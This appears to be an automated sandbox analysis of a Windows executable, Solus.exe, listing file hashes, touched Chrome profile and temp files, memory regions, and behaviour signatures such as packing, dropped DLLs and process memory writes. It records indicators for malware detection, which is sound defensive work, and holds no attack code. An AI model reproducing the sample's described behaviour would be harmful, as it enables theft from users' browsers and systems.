| SHA256 | 5aba935c6b57e73342b08b61d3844124e044588d704d14f83a063e9b90356b7a |
| SHA512 | f02c59b71aadd499e23d27fe903b8351f24fc2a5a975e9ef1fd986533639e8cdc239c097943fb7d116aebb948c508bc529b6519af23f20a3411cc584fa072ee4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9775d38db39e5d7d4bd78b319ab9a6f4 |
| SHA1 | 1baf51d6ad91d5ae16f42cdbbc73f62e317412e1 |
| SHA256 | 27913f3be4b780531a0e7e7a7fd3aba45d02a6e0c55acacb8b05527962a00852 |
| SHA512 | 429eeb8f1ed654bd86562e1612867126b0cde0339da5226eb3096bd047001deb43b3fca88c1e93c73f79eb151b8541afb44cd00d9106e3e85bf140c7ff3703f9 |
memory/5304-787-0x0000015CA5330000-0x0000015CA5338000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1771f785e19f0ad0d1b37b4fb6da7aca |
| SHA1 | 22eebe396eea58a410ac1826ea650f29daafda8c |
| SHA256 | 7d716ac3760186a752ac8c418845ea40229d7e2e006af3944dec00cab2e5646c |
| SHA512 | 914e807867ea903e09e64dc357556867b7f9cadeb2e19e1badf43a09c532a113accd74a17edebbedb1432d8966a6afe5ac0c3e39548060faebbc543510223aba |
memory/2296-806-0x00007FFB314E0000-0x00007FFB314EF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\l4RrER3uH3.tmp
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\j4Bs1uDwKW.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\IRXeHGErp2.tmp
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Local\Temp\zeMOkfzsPC.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\fYdUyEPWeW.tmp
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\awEq8aaYu5.tmp
| MD5 | 3abd2e2ba99b5d9c947c6686a8f3c06a |
| SHA1 | d466502e91bd3159514bad88a126de06fb76b2d3 |
| SHA256 | 89b1d6f40333f1cda766e4fe187a897e76b4d2b0cf41bc8c1a283120f928894e |
| SHA512 | 63f935fc6b081fe1c23a61940b327481a26c471f1d80ba930c53a74dadd248437060d5d0a1d3d6ea29c655f6f0511330ed311f5ad8f05ad3a417af7d1607b5f3 |
memory/2296-872-0x00007FFB2F810000-0x00007FFB2F83D000-memory.dmp
memory/2296-875-0x00007FFB18990000-0x00007FFB18B0E000-memory.dmp
memory/2296-874-0x00007FFB2F7C0000-0x00007FFB2F7E3000-memory.dmp
memory/2296-909-0x00007FFB18870000-0x00007FFB1898C000-memory.dmp
memory/2296-910-0x00007FFB2F7A0000-0x00007FFB2F7B9000-memory.dmp
memory/2296-906-0x00007FFB14560000-0x00007FFB14A89000-memory.dmp
memory/2296-905-0x00007FFB27600000-0x00007FFB276CD000-memory.dmp
memory/2296-896-0x00007FFB14A90000-0x00007FFB15082000-memory.dmp
memory/2296-904-0x00007FFB2F750000-0x00007FFB2F783000-memory.dmp
memory/2296-897-0x00007FFB2F840000-0x00007FFB2F864000-memory.dmp
memory/2296-911-0x00007FFB14A90000-0x00007FFB15082000-memory.dmp
memory/2296-933-0x00007FFB2F750000-0x00007FFB2F783000-memory.dmp
memory/2296-934-0x00007FFB14560000-0x00007FFB14A89000-memory.dmp
memory/2296-932-0x00007FFB2F7A0000-0x00007FFB2F7B9000-memory.dmp
memory/2296-931-0x00007FFB18990000-0x00007FFB18B0E000-memory.dmp
memory/2296-930-0x00007FFB2F7C0000-0x00007FFB2F7E3000-memory.dmp
memory/2296-929-0x00007FFB2F7F0000-0x00007FFB2F809000-memory.dmp
memory/2296-928-0x00007FFB2F810000-0x00007FFB2F83D000-memory.dmp
memory/2296-927-0x00007FFB314E0000-0x00007FFB314EF000-memory.dmp
memory/2296-926-0x00007FFB2F840000-0x00007FFB2F864000-memory.dmp
memory/2296-925-0x00007FFB18870000-0x00007FFB1898C000-memory.dmp
memory/2296-923-0x00007FFB2F740000-0x00007FFB2F74D000-memory.dmp
memory/2296-922-0x00007FFB2F130000-0x00007FFB2F144000-memory.dmp
memory/2296-920-0x00007FFB27600000-0x00007FFB276CD000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 19:50
Reported
2024-06-20 20:20
Platform
win7-20240611-en
Max time kernel
1562s
Max time network
1564s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Solus.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2020 wrote to memory of 2612 | N/A | C:\Users\Admin\AppData\Local\Temp\Solus.exe | C:\Users\Admin\AppData\Local\Temp\Solus.exe |
| PID 2020 wrote to memory of 2612 | N/A | C:\Users\Admin\AppData\Local\Temp\Solus.exe | C:\Users\Admin\AppData\Local\Temp\Solus.exe |
| PID 2020 wrote to memory of 2612 | N/A | C:\Users\Admin\AppData\Local\Temp\Solus.exe | C:\Users\Admin\AppData\Local\Temp\Solus.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Solus.exe
"C:\Users\Admin\AppData\Local\Temp\Solus.exe"
C:\Users\Admin\AppData\Local\Temp\Solus.exe
"C:\Users\Admin\AppData\Local\Temp\Solus.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI20202\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
memory/2612-23-0x000007FEF57D0000-0x000007FEF5DC2000-memory.dmp